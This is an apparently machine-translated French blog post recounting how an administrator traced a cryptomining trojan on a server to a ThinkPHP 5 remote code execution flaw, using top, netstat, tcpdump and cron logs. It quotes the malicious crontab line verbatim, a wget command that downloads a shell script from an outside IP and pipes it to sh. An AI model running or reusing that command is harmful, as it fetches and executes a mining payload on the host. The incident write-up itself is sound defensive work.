Hier, j'ai découvert qu'un serveur était soudainement lent Le haut montre que plus de 100% de l'utilisation du processeur de plusieurs processus est
La commande d'exécution est :
/tmp/php -s /tmp/p2.conf
Il est fondamentalement certain qu'elle a été bloquée
L'étape suivante consiste à déterminer la source
le dernier n'a aucun enregistrement de connexion
Tuez d'abord ces processus, mais ils réapparaissent quelques minutes plus tard
Voyons ce que veut ce cheval de Troie à faire en premier
netstat a vu Ce cheval de Troie a ouvert un port et établi une connexion avec une IP étrangère
Cependant, tcpdump n'a trouvé aucun transfert de données pendant un moment
Qu'est-ce que il veut faire ?
Continuez à vérifier les journaux
J'ai trouvé dans le journal cron que l'utilisateur www a une opération de synchronisation crontab, ce qui est fondamentalement le problème
wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1
J'ai téléchargé quelques problèmes et j'ai vu Il semble qu'il s'agisse d'un cheval de Troie minier
L'utilisateur www sur le serveur a été créé en installant lnmp. En regardant la source, il s'agit probablement d'une vulnérabilité Web.
Regardez encore, les autorisations de php sous /tmp sont www.
Vérifiez les logs de plusieurs sites sous lnmp et constatez que la vulnérabilité d'exécution de code à distance récemment exposée dans thinkphp 5 est utilisée
Détails de la vulnérabilité : https://nosec.org/home/detail/2050.html
Réparer le problème et le résoudre
Mais ce site est un site de test et le port l'écoute est 8083. Y a-t-il des pirates informatiques maintenant ? Pouvez-vous commencer à détecter les ports non conventionnels ?
Source : https://www.simapple.com/425.html